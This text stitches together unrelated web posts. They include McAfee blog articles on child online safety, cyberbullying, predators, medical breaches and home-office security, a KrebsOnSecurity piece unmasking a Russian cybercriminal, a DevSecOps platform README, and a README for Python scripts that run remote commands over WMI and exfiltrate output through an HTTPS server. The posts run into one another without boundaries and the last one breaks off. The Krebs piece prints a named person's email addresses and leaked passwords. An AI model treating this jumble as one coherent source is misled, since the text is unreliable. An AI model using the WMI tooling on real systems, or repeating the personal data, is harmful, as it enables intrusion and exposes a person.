When choosing a platform for your child’s virtual playdates or hangouts, consider aspects like age restrictions, privacy settings, and whether the platform allows parental controls. Additionally, evaluate the platform’s reputation regarding safety – a quick internet search can provide insights into any security issues or breaches the platform may have had in the past. Remember, the goal is to create a safe and enjoyable online experience for children.
One of the essential ways to ensure online safety for kids is by properly setting up privacy settings and parental controls on the communication tools they use. These settings can limit what information is shared and with whom, restrict access to certain content, and even set time limits for usage. Parental controls are a fantastic way of managing and monitoring your child’s online activities without being overly intrusive.
However, it’s important to note that these controls and settings are not foolproof. They should be used in conjunction with open communication and education about online safety. It’s essential to explain to children why these measures are in place, rather than just imposing them. They are more likely to follow these guidelines if they understand their purpose.
McAfee Pro Tip: Parental controls are effective in monitoring children, but nothing beats proactive digital parenting. Managing digital parenting doesn’t need to be daunting, especially when you approach it step by step. Know how parental controls and digital parenting can help create good habits.
Establishing clear guidelines for online communications is another critical aspect of ensuring a secure online environment for kids. These guidelines should be age-appropriate and cover aspects like sharing personal information, accepting friend requests, and how to behave respectfully online.
It’s also important to educate kids on the permanence of their online activities. Once something is shared online, it can be difficult, if not impossible, to completely remove it. They should understand the potential impact of their online behavior on their future, such as college admissions or job opportunities. Encouraging safe and responsible online behavior can go a long way in mitigating many of the potential risks associated with online communication.
→ Dig Deeper: Teens’ Online Behavior Can Get Them in Trouble
In addition to safety measures, it’s also important to establish some etiquette for virtual playdates to ensure they are enjoyable and respectful for everyone involved. These guidelines should include respecting others’ time, muting when not speaking to avoid background noise, and understanding when to use the chat feature versus when to speak up.
It’s also important to discuss how to handle disagreements or misunderstandings that may arise during these virtual gatherings. Encourage kids to express themselves respectfully and listen to others’ perspectives. Remind them that it’s okay to disagree with someone but that it should be done in a respectful and kind manner.
Depending on the age of your child, you may need to monitor the amount of time they spend on virtual activities. It’s easy for kids to lose track of time when they are engrossed in a fun virtual playdate or hangout. Setting and enforcing time limits can help prevent screen addiction and ensure your child has a balanced life with ample time for physical activities, schoolwork, and offline social interactions.
To make this process easier, you can use the built-in screen time management features available on most devices or utilize third-party apps that provide more detailed monitoring and control. Talk to your child about the importance of balancing online and offline activities. Make sure they understand that these limits are set out of concern for their well-being, not as a form of punishment.
Just like offline interactions, teaching kids to be respectful in their digital communications is crucial. They should understand that the same rules of kindness and respect apply, whether they’re interacting with others face-to-face or through a screen. Cyberbullying is a significant concern for many parents, and teaching children to treat others respectfully can help mitigate this risk.
Encourage your child to empathize with others by imagining how they would feel if the roles were reversed. Foster an online culture of acceptance, understanding, and respect by setting a positive example through your own online interactions. Remember, kids often emulate the behavior they see around them.
→ Dig Deeper: 5 Digital Family Values to Embrace to Make the Internet a Better Place
Open communication is the key to any successful relationship, and this holds true for your relationship with your child. Encourage them to talk to you about their online experiences, both good and bad. This can help you identify any potential problems before they escalate and provide guidance on how to handle various situations.
Ensure your child feels comfortable coming to you with any issues or concerns they may have. Make it clear that you’re there to help, not to chastise them for making mistakes. Remember, the online world can be a confusing and intimidating place for kids, and they need to know they have a trusted adult to turn to when they need help navigating it.
The online world is constantly evolving, so staying up-to-date with the latest safety tips is crucial. Regularly check reliable online safety resources and learn about the latest threats, trends, and best practices. This can help you prepare for and mitigate potential risks before they impact your child.
Consider joining online communities where parents share tips and advice about online safety. These platforms can be a great source of information and support as you navigate the digital world with your child. Remember, knowledge is power, and the more informed you are, the better you can protect your child.
In conclusion, ensuring online safety during virtual playdates, hangouts, and video chats involves a combination of selecting the right communication platforms, using privacy settings and parental controls, establishing guidelines for online communications, and promoting open, respectful interactions. As parents and caregivers, it’s essential to remain vigilant and proactive in teaching our children about online safety.
However, it’s equally important to remember that our ultimate goal isn’t to eliminate all online risks but to create a balance where our kids can enjoy the benefits of the virtual world while being mindful of its potential pitfalls. By employing the strategies discussed in this article, you can provide a safe and enjoyable online environment for your child, fostering their growth and development while ensuring their safety.
The post Keeping Virtual Play Dates, Hangouts, and Video Chats Safe for Everyone appeared first on McAfee Blog.
As a parent and a professional in the cybersecurity industry, I am incredibly aware of the importance of online safety, particularly as it relates to children. Despite vast improvements in technology and cybersecurity, the reality is that kids lack the resources and knowledge to protect themselves against the multitude of threats that exist online. The majority of domestic tech devices, such as personal computers and smartphones, only have basic consumer antivirus software, if any at all. This puts children at significant risk of falling victim to cyber threats like malware and phishing attacks.
However, the risks children face online aren’t limited to just these digital threats. The internet, in all its vastness, also exposes our children to many other potential dangers, from online predators in gaming environments to unrestricted internet usage in their downtime. This guide is geared towards educating and providing effective strategies for parents and other concerned individuals to ensure the online safety of children.
→ Dig Deeper: Reports of Online Predators on the Rise. How to Keep Your Kids Safe.
Recent statistics from Pew Research Center found that 46% of U.S. teenagers aged 13 to 17 have encountered at least one of six different cyberbullying behaviors. Among these behaviors, name-calling is the most prevalent, with 32% of teens reporting that they have been subjected to offensive name-calling online or on their phones. Additionally, 22% have had false rumors spread about them online, and 17% have received unsolicited explicit images.
Furthermore, 15% of teenagers have dealt with persistent inquiries from someone other than a parent about their whereabouts, activities, and companions. Additionally, 10% have faced physical threats, and 7% have had explicit images of themselves shared without their consent. In total, 28% of teenagers have experienced multiple forms of cyberbullying.
→ Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report
The high level of exposure and the increasing number of online threats led to the development of the McAfee’s Digital Safety Program, previously known as McAfee’s Online Safety for Kids. This program provides essential resources that can be used by cybersecurity experts to educate school children about the potential dangers that lurk online and how best to protect themselves. Over the past five years, the highly interactive program has been implemented in numerous school systems across the United States, shedding light on the depth and extent of the threats that children encounter daily.
→ Dig Deeper: McAfee Relaunches Award-Winning Online Safety Program for Kids
The McAfee Digital Safety Program is a collaborative effort that brings together the expertise of security professionals, the experiences of children, and the efforts of community partners. It involves not just theoretical learning, but also anecdotal sharing of online experiences, which greatly enhances the effectiveness of the program. Participants of the program, both children and adults alike, often leave with a profound sense of the multitude of threats that children encounter online. By sharing these real-world experiences, it allows everyone involved in the program to better understand the landscape of online dangers and reinforces the importance of adequate protection measures.
Recently, at our Technical Forum in Puerto Rico, the McAfee team and our partners introduced the Digital Safety Program to a private middle school, engaging more than 100 students from grades 6 to 8. Previous participants in the program have ranged from company owners and senior executives to sales and marketing teams. However, at this event, it was the technical experts delivering the message. This not only allowed their technical peers to understand the ease and satisfaction of participating in such a program but also inspired them to consider innovative ways of protecting children and getting their fellow peers and clients involved.
The McAfee Digital Safety Program does more than just promote online safety – it serves as a vessel of corporate social responsibility, connecting security professionals with their local communities and raising awareness of the need for better cybersecurity measures. Additionally, the program offers tangible benefits for partners involved. Many have reported increased brand awareness and appreciation from the communities they serve. Plus, delivering the online safety message serves as a valuable training tool that improves their sales and marketing skills.
While the quest for online safety for children comes with business benefits, it is an endeavor that is worth pursuing regardless. We encourage all our partners and anyone interested to learn more about the McAfee Digital Safety Program and consider how they can implement it in their local communities.
While certain elements of digital threats are beyond our control, what we can do is educate our children and ourselves about online safety and equip ourselves with tools that can help guard against such risks. McAfee’s Digital Safety Program aims to provide adequate knowledge and resources for this purpose. However, it is also important to use the available protection measures that can make the digital playground safer for our children.
One of the first measures to ensure online safety is having a strong and reliable security software installed on the devices used by children. This software should be effective in protecting against malware, phishing attacks, and other online threats. It is also important to keep the software updated, as new threats emerge regularly. Furthermore, parental control features, such as content filters and usage restrictions, can provide an extra layer of protection by limiting the exposure of children to inappropriate or dangerous online content.
Despite implementing technological measures to ensure online safety, the most effective tool is open and thorough conversations about the potential risks and threats that exist online. Children are often unaware of the potential dangers or may not fully comprehend the gravity of these threats. Therefore, it is essential to engage kids in an ongoing dialogue about online safety, equip them with the knowledge to make informed decisions, and encourage them to seek adult assistance when they encounter something unfamiliar or suspicious online.
It is important to have these discussions as early and as often as possible. But, of course, the content and tone of conversations should be age-appropriate. It is equally important to create a safe and non-judgemental environment where children feel comfortable discussing their online experiences without fear of punishment or ridicule. Building trust with children can go long way toward ensuring their safety online.
McAfee Pro Tip: Implement parental controls on their devices gradually, even if your kids may not be enthusiastic about it. This is akin to encouraging them to consume vegetables; it’s a measure taken for their well-being.
The internet is a wonderful tool for learning and communication but, like every innovation, it comes with its own set of risks and threats, especially for our children who are particularly vulnerable. As adults, we need to play our part in en/suring their online safety. Through proactive measures and ongoing open conversation’s, we can create a safer online environment for our children. Initiatives like McAfee’s Digital Safety Program are essential in making this a reality. It is a continuous journey, but the efforts to protect our children from online threats and to educate them about online safety are undoubtedly worth it.
The post Keeping Kids Safe from Online Threats appeared first on McAfee Blog.
Last week, KrebsOnSecurity broke the news that one of the largest cybercrime services for laundering stolen merchandise was hacked recently, exposing its internal operations, finances and organizational structure. In today’s Part II, we’ll examine clues about the real-life identity of “Fearlless,” the nickname chosen by the proprietor of the SWAT USA Drops service.
Based in Russia, SWAT USA recruits people in the United States to reship packages containing pricey electronics that are purchased with stolen credit cards. As detailed in this Nov. 2 story, SWAT currently employs more than 1,200 U.S. residents, all of whom will be cut loose without a promised payday at the end of their first month reshipping stolen goods.
The current co-owner of SWAT, a cybercriminal who uses the nickname “Fearlless,” operates primarily on the cybercrime forum Verified. This Russian-language forum has tens of thousands of members, and it has suffered several hacks that exposed more than a decade’s worth of user data and direct messages.
January 2021 posts on Verified show that Fearlless and his partner Universalo purchased the SWAT reshipping business from a Verified member named SWAT, who’d been operating the service for years. SWAT agreed to transfer the business in exchange for 30 percent of the net profit over the ensuing six months.
Cyber intelligence firm Intel 471 says Fearlless first registered on Verified in February 2013. The email address Fearlless used on Verified leads nowhere, but a review of Fearlless’ direct messages on Verified indicates this user originally registered on Verified a year earlier as a reshipping vendor, under the alias “Apathyp.”
There are two clues supporting the conclusion that Apathyp and Fearlless are the same person. First, the Verified administrators warned Apathyp he had violated the forum’s rules barring the use of multiple accounts by the same person, and that Verified’s automated systems had detected that Apathyp and Fearlless were logging in from the same device. Second, in his earliest private messages on Verified, Fearlless told others to contact him on an instant messenger address that Apathyp had claimed as his.
Intel 471 says Apathyp registered on Verified using the email address triploo@mail.ru. A search on that email address at the breach intelligence service Constella Intelligence found that a password commonly associated with it was “niceone.” But the triploo@mail.ru account isn’t connected to much else that’s interesting except a now-deleted account at Vkontakte, the Russian answer to Facebook.
However, in Sept. 2020, Apathyp sent a private message on Verified to the owner of a stolen credit card shop, saying his credentials no longer worked. Apathyp told the proprietor that his chosen password on the service was “12Apathy.”
A search on that password at Constella reveals it was used by just four different email addresses, two of which are particularly interesting: gezze@yandex.ru and gezze@mail.ru. Constella discovered that both of these addresses were previously associated with the same password as triploo@mail.ru — “niceone,” or some variation thereof.
Constella found that years ago gezze@mail.ru was used to create a Vkontakte account under the name Ivan Sherban (former password: “12niceone“) from Magnitogorsk, an industrial city in the southern region of Russia. That same email address is now tied to a Vkontakte account for an Ivan Sherban who lists his home as Saint Petersburg, Russia. Sherban’s profile photo shows a heavily tattooed, muscular and recently married individual with his beautiful new bride getting ready to drive off in a convertible sports car.
A pivotal clue for validating the research into Apathyp/Fearlless came from the identity intelligence firm myNetWatchman, which found that gezze@mail.ru at one time used the passwords “геззи1991” (gezze1991) and “gezze18081991.”
Care to place a wager on when Vkontakte says is Mr. Sherban’s birthday? Ten points if you answered August 18 (18081991).
Mr. Sherban did not respond to multiple requests for comment.
SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.
At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.
SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.
SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.
SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.
Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.
SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.
SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.
For more information please refer to our Official Rest API Documentation
SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.
SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.
Get started with SecuSphere using our comprehensive user guide.
You can install SecuSphere by cloning the repository, setting up locally, or using Docker.
FreshRSS $ git clone https://github.com/SecurityUniversalOrg/SecuSphere.gitNavigate to the source directory and run the Python file:
$ cd src/
$ python run.pyBuild and run the Dockerfile in the cicd directory:
$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latestUse Docker Compose in the ci_cd/iac/ directory:
$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml upPull the latest version of SecuSphere from Docker Hub and run it:
$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latestWe value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.
We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.
Unfortunately, cyberbullying has become a prevalent and emerging threat in our digital age. This type of bullying, carried out through computers and similar technologies, including cell phones, often involves harmful or intimidating comments and public posts created with malevolent intent to humiliate the victim. It’s a phenomenon that doesn’t only affect adults but is incredibly common among young people. As a result, it’s crucial to understand how to help your children navigate and mitigate this pervasive, especially now that they can leave digital footprints anywhere and encounter people with bad intentions.
One of the distinguishing factors of cyberbullying is that, unlike traditional in-person bullying, it doesn’t simply end when the bully is out of sight. Today, bullies can virtually pursue their victims everywhere through technology. This implies that bullying can transpire without the victim’s immediate consciousness, and due to the extensive reach of social media, the bullying can be witnessed by a significantly larger audience than the conventional school playground.
Bearing in mind the challenges in getting a cyberbully to cease their harmful behavior, the most effective strategy is to educate your children about safe online habits to prevent such situations from arising in the first place.
→ Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report
Evolved from the classic schoolyard bullies of old, these cyberbullies can take various forms depending on their attack vector and intent. In fact, there are said to be four types of cyberbullies: the Vengeful Angel, the Power Hungry Cyberbully, Revenge of the Nerds/Inadvertent Cyberbully, and Mean Girls. The Vengeful Angel bullies in order to protect the weak/other victims and often takes action to protect a loved one or friend. The Power Hungry archetype, however, is just a nasty, unkind person who wants to display dominance and control over others. Then there’s the Inadvertent Cyberbully, who are usually the ones getting bullied online or in real life and are typically trying to enact some form of justice or revenge anonymously from the web. Mean Girls are the opposite – and take their online actions in order to impress a group of friends or gain social status.
Not only is there a variety in the kinds of bullies across the web, but also many types of cyberbullying techniques these meanies use to bother their victims. First and foremost, there’s harassment, which involves repeated, offensive messages sent to a victim by a bully on some type of online medium. These messages can be rude, personal, and even threatening, with one recent example emerging between two wives of professional hockey players. Similar to harassment is Flaming – an online fight conducted via emails, social media messages, chat rooms, you name it.
Then there are very targeted attacks, named Exclusion and Outing. With Exclusion, cyberbullies select one individual to single out. Exclusion is a popular method, with examples everywhere, from high students in Iowa to well-known celebrities. With Outing, these harassers share private information, photos, and videos of a single person to humiliate them online. There’s also the anonymous angle, AKA Masquerading, where a cyberbully creates a fake online identity to belittle, harass, and degrade their victim – which a nurse in New Zealand was a victim of for a whopping five years.
Parents should inform their children that their online activities will be monitored using parental control software. Explaining how this software works and how it can protect them is essential. This policy should be well established before your child gets their phone or computer.
Furthermore, parents should discuss cyberbullying with their children and help them understand how it happens. This discussion should take place before your child gets their devices. Before a child gets their own digital devices, they must disclose their passwords to their parents. Parents can reassure them that these passwords will only be used during emergencies.
A condition set before children get their own digital devices is that they should consent to instructions on smart online habits. Importantly, they must understand that once something is posted online, it stays there forever.
Another essential guideline for owning a device is that children should be cautious about their personal information. They should be advised not to publicly share their cell phone number and email address and should never disclose their passwords, even to close friends.
→ Dig Deeper: 8 Signs It May Be Time for Parental Controls
Once your child obtains their digital devices, engaging in role-playing exercises with them is suggested. This allows parents to simulate scenarios where the child might encounter a cyberbully, teaching them appropriate responses. This exercise can also provide a safe space for your child to practice dealing with cyberbullying tactics and learn to act assertively without resorting to aggression or submission.
In this role-playing activity, parents should encourage their children to report any bullying incidents, even if it is simulated or perceived as insignificant. This activity not only cultivates resilience but also reassures children that they won’t be blamed or punished for being a victim of cyberbullying.
Parents must maintain vigilance regarding their child’s internet activities despite all preventive measures. Regular check-ins and encouraging open communication about their online experiences can create a strong bond of trust between parents and children. Assure them they can approach you without fear if they are bullied online. Encourage them to share any suspicious interactions and reassure them that they won’t be in trouble for reporting cyberbullying incidents.
If possible, try to familiarise yourself with the social media platforms that your children are using. Understanding these platforms can provide insight into their online experience and potential risks. Such knowledge can be valuable when initiating discussions about cyberbullying, providing tangible examples and relatable scenarios.
McAfee Pro Tip: Get McAfee’s parental control to safeguard your children against online threats and cyberbullying. With its features, you can actively supervise your kids’ online interactions, establish usage time restrictions, and prevent exposure to inappropriate content. This reassures you that your children can explore the online realm while enjoying a layer of protection.
Cyberbullying is a complex issue that evolves with the rapid advancements of technology and social media platforms. Therefore, parents must stay updated about the latest forms of cyberbullying and the newest safety settings available on various platforms. Parents should also regularly educate themselves about digital safety and responsible internet usage and share this information with their children to boost their awareness and readiness.
Parents and children can attend webinars, workshops, and seminars about cyberbullying and online safety. Learning together provides a good bonding exercise and ensures that both parties are on the same page. Schools and local community centers often offer resources and programs for cyberbullying awareness and prevention.
→ Dig Deeper: Cyberbullying’s Impact on Both Society and Security
Typically, cyberbullying is common among teens navigating the trials and tribulations of middle and high school. But that doesn’t mean it’s exclusive to teens, and that doesn’t mean there aren’t steps parents and kids alike can do to stop cyberbullying in its tracks.
If you’re the subject of cyberbullying, the first thing you need to do is block the bully. Then, make sure you collect evidence – take screenshots, print the proof, and do whatever you can to have material to back up your claim. It depends on the type of cyberbullying at work, but you can also use the internet to your advantage and look up relevant resources to aid with your issue.
If you’re a parent, the most important thing is communication. Make yourself available as a resource and remind your kids that they can tell you anything happening in their online world. Beyond that, continuously weave cybersecurity into your family discussions. Remind kids of the simple steps to be safe online, and ensure they know when to flag a cyberbully or online scheme.
There are also technical avenues you can take to protect your kid online. Look into solutions that will help you monitor your family’s online interactions, such as McAfee Safe Family. This solution, for instance, can help you set rules and time limits for apps and websites and see what your kids are up to at a glance. Of course, these solutions are not the be-all and end-all for stopping cyberbullying, but they can help.
Now, there’s still a lot more research that has to be done to understand the cyberbullying problem society is faced with fully. So, as this problem continues to evolve, so must the research, solutions, and regulations that will be created to combat the issue. With the right proactive action, people everywhere can stand up to cyberbullies.
→ Dig Deeper: Cyberbullying – How Parents Can Minimize Impact On Kids
In conclusion, cyberbullying is a pressing issue that requires continuous attention and education. By teaching your children what it is and how it happens, setting up rules for responsible device usage, conducting role-play exercises together, and staying informed about their online activities, you can better equip them to navigate the digital world safely. Remember, the ultimate goal is not to control your child’s online activities but to empower them with the tools and understanding necessary to protect themselves online.
The post A Detailed Guide on Cyberbullying appeared first on McAfee Blog.
Despite the extensive media coverage and awareness campaigns, it’s harrowing to admit that children, particularly vulnerable teenagers, are still targeted by online predators. This is not a matter exclusive to the “other” kids – it affects everyone, and young individuals’ innocent and accepting nature often leads them into the dangerous trap of these predators.
As parents, caregivers, and mentors, it’s our responsibility to educate and guide our children about the virtual perils that lurk within their screens. An essential part of this is continuous communication, ensuring they understand the gravity of the situation and can recognize the deceptive tactics employed by these predators.
A heartbreaking example of how these predators operate is the story of Nicole Lovell, a 13-year-old girl who made headlines not long ago. Nicole met David Eisenhauer, an engineering student from Virginia Tech, through the messaging app Kik. Their relations initially seemed harmless, characterized by playful flirtations and shared stories. However, their friendship took a horrific turn when they decided to meet in person, leading to Nicole’s tragic demise. Her body was found shortly after their encounter.
David exhibited no signs of having a ‘dark side,’ an aspect that made their meeting seem all the more innocent. This incident is a stark reminder that anyone can fall prey to such predators, regardless of their background or circumstances. This is why discussing and dissecting such incidents with our children is crucial to teaching them the harsh realities of the digital world.
Identifying an online predator’s markers is a critical aspect of child safety education. More often than not, these individuals are cunning and mentally unbalanced and spend a significant amount of their time seeking and ‘grooming’ their prospective victims online. The ultimate goal of these predators is to exploit children, either by convincing them to send inappropriate photos or by meeting them in person.
Initiating a continuous dialogue with your children about these predators is crucial. Make them aware of the tactics these individuals employ, such as appearing overly friendly or empathetic. Let them know that predators will go to any length to appear younger and more relatable.
→ Dig Deeper: Reports of Online Predators on the Rise. How to Keep Your Kids Safe
Addressing such a sensitive issue with your children can be challenging but necessary. Start by discussing cases like Nicole’s, focusing not only on the tragic outcome but also on the lead-up events and why she may have developed such a strong online connection. Discussing how innocent online friendships can spiral into dangerous situations can be an excellent eye-opener for your kids.
It’s crucial to teach your kids to look out for strangers who are “too friendly” or excessively understanding. Tell them that predators keep themselves updated with the latest movies, music, and trends to seem younger and easily start conversations with children. Remember, predators will say anything to appear more youthful than they actually are.
You don’t always know what your children are doing online. Their digital footprints could be anywhere. That’s why it is imperative to understand the red flags and warning signs that may signal a hazardous online interaction, especially when they already encounter a predator, and you’re still in the shadow.
Reinforcing the importance of online privacy is a crucial step in protecting your kids from virtual predators. Teach your children that personal information such as their full name, address, school, and phone number should never be shared online. They must also understand that specific images and details about their life can also reveal too much to an online predator. Remind them to limit geotagged photos as this can expose their location, and also to strictly control who is able to view their social media accounts.
→ Dig Deeper: Why You Should Think Before Geotagging that Selfie
Explain to your kids the dangers of accepting friend requests or communicating with strangers online. Make them aware that individuals posing as children or teenagers could be adults with malicious intent. Reinforce that anyone who asks them to keep a conversation secret or requests for personal information or inappropriate content is a potential danger, and they should inform you immediately if this occurs.
→ Dig Deeper: Making Online Safety a Priority for Our Tech-Savvy Children
As parents, we must stay informed about our children’s online activities, which goes far beyond just asking them about it. This can involve regularly reviewing their social media profiles and friends lists and ensuring they only interact with people they know personally. Familiarize yourself with the platforms and apps your children use to comprehend their functionalities and potential risks better.
Creating house rules regarding internet use can be an effective measure to ensure online safety. This could involve having specific periods when the internet can be used, limiting the time spent online, and setting out where internet-access devices can be used. For instance, allowing internet use only in common areas instead of bedrooms can be a good practice. It is essential to have ongoing dialogues about these rules and their reasons so your children can understand and appreciate their importance.
In an age where the online world is a significant part of our children’s lives, online safety education is essential. It’s crucial that, as parents, caregivers, and mentors, we take proactive steps to protect our children from the pervasive threat of online predators. This means having open and ongoing conversations about the real dangers that can lurk behind a screen, teaching kids to guard their online presence, and implementing online safety measures. Together, we can ensure the internet becomes safer for our children to learn, explore, and connect with others. Protect your whole family with McAfee+ Family plans.
The post Could Your Kids Spot an Online Predator? appeared first on McAfee Blog.
As healthcare integrates increasingly digital processes into its operations, the need for robust security measures increases. For many of us, visiting our healthcare provider involves filling out forms that are then transferred into an Electronic Health Record (EHR) system. We put our trust in these healthcare institutions, expecting them to take the necessary steps to store our sensitive data securely. However, with a significant rise in medical data breaches, a whopping 70% increase over the past seven years, it has become more important to understand how these breaches occur and how we can protect ourselves.
Recently, LabCorp, a medical testing company, announced a breach affecting approximately 7.7 million customers, exposing their names, addresses, birth dates, balance, and credit card or bank account information. This breach occurred due to an issue with a third-party billing collections vendor, the American Medical Collection Agency (AMCA). Not long before this, Quest Diagnostics, another company collaborating with AMCA, experienced a similar breach, affecting 11.9 million users.
Medical data is, by nature, nonperishable, making it a highly valuable asset for cybercriminals. This means that while a credit card number or bank account detail can be changed if compromised, medical information remains constant, maintaining its value over time. This also suggests that once procured, this information can be used for various malicious activities, from identity theft to extortion.
Realizing that the healthcare industry is riddled with various security vulnerabilities is crucial. Unencrypted traffic between servers, the ability to create admin accounts remotely, and the disclosure of private information are all shortcomings that these cybercriminals can exploit. With such access, they can permanently alter medical images, use medical research data for extortion, and much more. According to the McAfee Labs Threats Report, the healthcare sector witnessed a 210% increase in publicly disclosed security incidents from 2016 to 2017, resulting from failure to comply with security best practices or address vulnerabilities in medical software.
→ Dig Deeper: How to Safeguard Your Family Against A Medical Data Breach
While the onus lies on healthcare institutions to ensure the security of patients’ data, there are several steps that individuals can take on their own to safeguard their privacy. These steps become particularly pivotal if you think your personal or financial information might have been compromised due to recent breaches. In such instances, following certain best practices can significantly enhance your personal data security.
One such measure is placing a fraud alert on your credit. This effectively means that any new or recent requests will be scrutinized, making it challenging for fraudulent activities to occur. Additionally, the fraud alert enables you to access extra copies of your credit report, which you can peruse for any suspicious activities.
Another effective step you can consider is freezing your credit. Doing so makes it impossible for criminals to take out loans or open new accounts in your name. However, to execute this effectively, remember that credit needs to be frozen at each of the three major credit-reporting agencies – Equifax, TransUnion, and Experian.
Moreover, vigilance plays a critical role in protecting your personal data. Regularly checking your bank account and credit activity can help you spot any anomalies swiftly, allowing you to take immediate action.
McAfee Pro Tip: To lock or to freeze? That is the question. Credit lock only offers limitations in accessing an account. A credit freeze generally has more security features and financial protections guaranteed by law and the three major credit bureaus, so you’ll have more rights and protection if identity theft, fraud, scams, and other cybercrimes occur with a credit freeze compared to a credit lock. Learn more about the difference between credit freeze and credit lock here.
Identity theft protection services offer an additional layer of security to protect your personal as well as financial information. They actively monitor your accounts, provide prompt alerts for any suspicious activities, and help you recover losses if things go awry. An identity theft protection service like McAfee Identity Theft Protection can be beneficial. Remember, however, that even with such a service, you should continue practicing other security measures, as they form part of a comprehensive approach to data security.
These services work in the background to ensure constant protection. However, choosing a reputable and reliable identity theft protection service is essential. Do thorough research before committing and compare features such as monitoring services, recovery assistance, and insurance offerings. This step can help protect you not only during medical data breaches but also on other digital platforms where your personal information is stored.
If you suspect your personal data has been compromised, you should check your bank account and credit activity frequently. Regular monitoring of your accounts empowers you to stop fraudulent activity. Many banks and credit card companies provide free alerts—through an email or text message—whenever a new purchase is made, an unusual charge is noticed, or your account balance drops to a particular level.
Besides, you should also consider utilizing apps or online services provided by banks and credit companies to keep an eye on your accounts. Such tools can help you track your financial activity conveniently and take instant action if any suspicious activity is spotted. Regularly updating your contact information with banks and credit companies is also important, as it ensures you receive all alerts and updates on time.
→ Dig Deeper: Online Banking—Simple Steps to Protect Yourself from Bank Fraud
Increased digitization in the healthcare sector has brought convenience and improved patient services. However, it also presents attractive targets for cybercriminals eager to exploit vulnerabilities for personal gain. Medical data breaches are concerning due to their potential long-term impacts, so it’s critical to protect your personal information proactively.
While healthcare institutions must shoulder the primary responsibility to safeguard patient information, users are far from helpless. By placing a fraud alert, freezing your credit, using identity theft protection services like McAfee Identity Theft Protection, and maintaining vigilance over your financial activity, you can form a comprehensive defense strategy to protect yourself against potential breaches.
The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blog.
Set of python scripts which perform different ways of command execution via WMI protocol.
https://whiteknightlabs.com/2023/06/26/navigating-stealthy-wmi-lateral-movement/
Is a python script which authenticates to a remote WMI instance and execute commands via Scheduled Tasks.
To run the script:
python3 wmiexec_scheduledjob.py -i <ip_address> -u <username> -p <password> -c <command>Is a python script which authenticates to a remote WMI instance and execute commands via Win32_Process.
To run the script:
python3 wmiexec_win32process.py -i <ip_address> -u <username> -p <password> -c <command>Is a python script which creates a HTTPS server (with a self-signed SSL certificate). Used to exfiltrate the command's output.
Before running the HTTP server, make sure to generate the certificates by running:
openssl genpkey -algorithm RSA -out server.key
openssl req -new -key server.key -out server.csr
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crtIf everything is done correctly, the server will be running without any error:
python3 webserver_ssl.pyhttps://github.com/XiaoliChan/wmiexec-RegOut
https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob
Kleiton Kurti (@kleiton0x00)
As of the writing of this article, the height of the pandemic seems like a distant but still vivid dream. Sanitizing packages, sparse grocery shelves, and video conferencing happy hours are things of the past for the majority of the population. Thank goodness.
A “new normal” society is adapting to today’s working culture. The work landscape changed significantly since 2020, and it might never return to what it once was. In 2022, workers spent an average 3.5 days in the office per week, which is 30% below the prepandemic in-office average.1
The work-from-home movement is likely here to stay, to the joy of employees seeking a better work-life balance and flexibility; however, some responsibility does fall upon people like you to secure home offices to protect sensitive company information.
To make sure you’re not the weak cyber link in your company’s security, make sure to follow these three tips for a secure home office.
When you’re not physically in front of your work computer, best practices dictate that you lock the screen or put your device to sleep. No matter how much you trust your family, roommates, or the trustworthy-looking person seated next to you at a café, your company device houses all kinds of corporate secrets. A stray glance from the wrong person could put that information’s secrecy in jeopardy. Plus, imagine your cat walking across your keyboard or a toddler mashing your mouse, deleting hours’ worth of work. Disastrous.
Then, when you’re done with work for the day, stow your device in a secure location, preferably a drawer with a lock. Even if your work computer is 10 times faster and sleeker than your personal laptop, keep each device in its designated sphere in your life: work devices only for work, personal devices only for personal activities.
